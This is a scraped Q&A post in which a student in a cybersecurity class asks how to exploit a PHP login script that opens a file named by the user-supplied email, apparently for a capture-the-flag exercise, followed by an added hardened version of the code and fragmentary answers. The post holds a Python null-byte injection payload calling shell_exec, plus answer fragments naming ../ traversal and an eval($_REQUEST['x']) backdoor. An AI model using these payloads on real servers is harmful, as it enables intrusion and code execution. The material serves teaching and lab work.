Using vulnerabilities in php fopen

I'm taking a cybersecurity class, and for the assignment we need to use a specific php file and get some access to the server on which it is located. I can set my own variables $email and $password as they are set with $_POST. I believe the only piece of code I can use is this.

$email = $_POST['email'];
$password = $_POST['password'];
....
// The account file path is built directly from the user-supplied email.
$accountfile = "./acounts/" . $email;

if(!file_exists($accountfile)){
  diefooter("unknown email address or password");
}
$fh = fopen($accountfile, "r");
if(!$fh){
  diefooter("Cannot open file $accountfile.");
}
// Account file layout: last name, first name, then the stored password.
$last = fgets($fh);
$first = fgets($fh);
$pass = fgets($fh);

if(strcmp($pass,$password)!=0){
  diefooter("wrong email or password.");
}

I know that there are vulnerabilities built into the fopen() function, and that I can access the shell with the correct input.

import requests

url = "http://<target-host>/cgi-bin/login.php"  # placeholder: the assignment's login URL (not given in the post)
filePath = "/var/ctf/music-copyright/html/cgi-bin/login.php"
shellKode = "exploit@gmail.com\0;echo shell_exec(" + '"cat ' + filePath + '");'
# payload = {'email': shellKode, 'password': 'test'}
testPayload = {'email': 'exploit@gmail.com', 'password': 'a'}
r = requests.post(url, data=testPayload)
print(r.text)
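As an added example (not the assignment's code and not taken from any answer), here is a hardened version of the same lookup. It assumes a Unix host, that the acounts/ directory sits beside the script but outside the web root, that the third line of each account file holds a password_hash() digest rather than the plaintext password, and that diefooter() is the assignment's own helper.

```php
<?php
// Added example, not the assignment's code: a hardened version of the lookup.
// Assumptions: accounts live in acounts/ beside this script but outside the web
// root, and line 3 of each file holds a password_hash() digest, not plaintext.
const ACCOUNTS_DIR = __DIR__ . '/acounts';

// Maps $email to its account file, or returns null if the email is unacceptable.
// The allow-list keeps "../", NUL bytes, CRLF and "scheme://" prefixes out of
// the path entirely; the realpath() containment check is a second, independent layer.
function accountPath(string $email): ?string
{
    if (!preg_match('/\A[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+\z/', $email)) {
        return null;
    }
    $base = realpath(ACCOUNTS_DIR);
    $real = realpath(ACCOUNTS_DIR . '/' . $email);   // false if the file does not exist
    if ($base === false || $real === false
        || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return null;   // missing, or resolved (e.g. via a symlink) outside acounts/
    }
    return $real;
}

// Returns true only for a contained account file whose stored hash matches.
// Every failure collapses to the same generic error further down, so the caller
// cannot tell "no such account" from "wrong password".
function verifyLogin(string $email, string $password): bool
{
    $path = accountPath($email);
    if ($path === null) {
        return false;
    }
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false || count($lines) < 3) {
        return false;
    }
    // password_verify() compares in constant time, unlike strcmp() on plaintext.
    return password_verify($password, $lines[2]);
}

$email    = (string) ($_POST['email'] ?? '');
$password = (string) ($_POST['password'] ?? '');
if (!verifyLogin($email, $password)) {
    diefooter("unknown email address or password");
}
```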

[Answer, score +4: text not recoverable from the scrape; only the token fopen() survives.]

[Answer, score +5: text not recoverable from the scrape. Surviving fragments, in order:

# 1 - CRLF and fopen(); $email; $fh; a reference to http://www.securiteam.com/unixfocus/5OP0C0A8AC.html; $password; $pass and strcmp; $pass = fgets($fh); a URL of the form http://your.ip.address/your-file; and the lines

$last = fgets($fh);
$first = fgets($fh);
$pass = fgets($fh);

followed by $last, $first, $pass.

# 2 - ../ in $email, fopen, acounts/, with the snippet

<?php
$fh = fopen("acounts/../../test.sh","r");
?>

followed by test.sh, $email, $password.

# 3 - .php; drew010; $email; eval() php code; $password; backdoor; acounts/.]

[Answer by drew010, score +3: text not recoverable from the scrape. Surviving fragments: $accountfile = "./acounts/" . $email; something@domain.php (username.php); "unhashed?"; <?php eval($_REQUEST['x'] ?>; http://thesite/accounts/something@domain.php?x=echo 'hi'; $_REQUEST['x'].]

Source: https://habr.com/ru/post/1667199/
